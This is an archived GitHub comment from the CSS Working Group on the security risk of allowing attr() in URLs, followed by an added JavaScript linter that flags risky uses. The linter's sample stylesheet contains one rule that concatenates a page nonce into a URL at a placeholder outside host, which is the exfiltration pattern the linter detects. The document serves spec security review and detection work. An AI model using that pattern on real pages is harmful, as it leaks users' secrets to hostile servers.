Re: [csswg-drafts] [css-values-5] allow attr() to be used for URLs (#12340)

As @Crissov says, `src()` lets you specify concatenation, which is the thing we're concerned about.

I don't understand how CORS would help us here. The security threat isn't accessing resources on the page's server against its will, it's extracting data from the page (like nonces or user IDs stored in data attributes, or implicitly in the parameters of other URLs) and sending it to *other* (hostile) servers. The hostile server could set up whatever CORS allowances it needs.

I *do* want to figure out a way to specify that host-language-defined "URL attributes" (like `<img src>` or `<a href>`) could be used *directly* as a `<url>` via `attr()`, but not when combined with other stuff. That doesn't allow your example, tho, where the URL is specified in a data attribute. That'll require a more general allowlist feature that we've so far avoided specifying.

-- 
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/12340#issuecomment-2978270319 using your GitHub account


Received on Monday, 16 June 2025 21:51:33 UTC
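As an added illustration (not part of the thread or the CSS spec), the distinction drawn in the comment above, written as a lint over stylesheet text: `attr()` naming a host-language URL attribute and used directly as the whole argument is allowed, while `attr()` on any other attribute, or `attr()` combined with other tokens inside `src()`/`url()`, is flagged. The `src`/`href` allowlist and the simplified `src()`/`url()` argument extraction are assumptions for illustration.

```javascript
// Added example, not code from the csswg-drafts thread. Assumed allowlist of
// host-language URL attributes (the "allowlist feature" the comment mentions).
const URL_ATTRS = new Set(["src", "href"]);

// Return the raw argument text of every src(...) / url(...) call in a
// stylesheet, honouring nested parentheses such as attr(...) inside src(...).
function urlFunctionArgs(css) {
  const args = [];
  const re = /\b(src|url)\(/gi;
  let m;
  while ((m = re.exec(css)) !== null) {
    let depth = 1, i = re.lastIndex;
    for (; i < css.length && depth > 0; i++) {
      if (css[i] === "(") depth++;
      else if (css[i] === ")") depth--;
    }
    if (depth !== 0) break; // unbalanced parentheses: stop scanning
    args.push(css.slice(re.lastIndex, i - 1).trim());
    re.lastIndex = i; // resume after the closing paren
  }
  return args;
}

// Classify one argument:
//   "ok"           no attr() involved
//   "allow-direct" attr(<url attribute>) used as the entire argument
//   "deny-attr"    attr() on a non-URL attribute (e.g. data-*), even when direct
//   "deny-concat"  attr() combined with other tokens (the concatenation case)
function classifyArg(arg) {
  if (!/\battr\(/i.test(arg)) return "ok";
  const direct = arg.match(/^attr\(\s*([\w-]+)\s*\)$/i);
  if (!direct) return "deny-concat";
  return URL_ATTRS.has(direct[1].toLowerCase()) ? "allow-direct" : "deny-attr";
}

function lintStylesheet(css) {
  return urlFunctionArgs(css).map(a => ({ arg: a, verdict: classifyArg(a) }));
}

// Constructed sample stylesheet covering the cases discussed in the comment.
const SAMPLE = `
img { background-image: src(attr(src)); }
img { background-image: src(attr(data-endpoint)); }
div { background-image: src("https://example.invalid/?v=" attr(data-nonce)); }
p { background-image: url("plain.png"); }
`;
```

Running `lintStylesheet(SAMPLE)` yields the verdicts allow-direct, deny-attr, deny-concat and ok for the four rules in order.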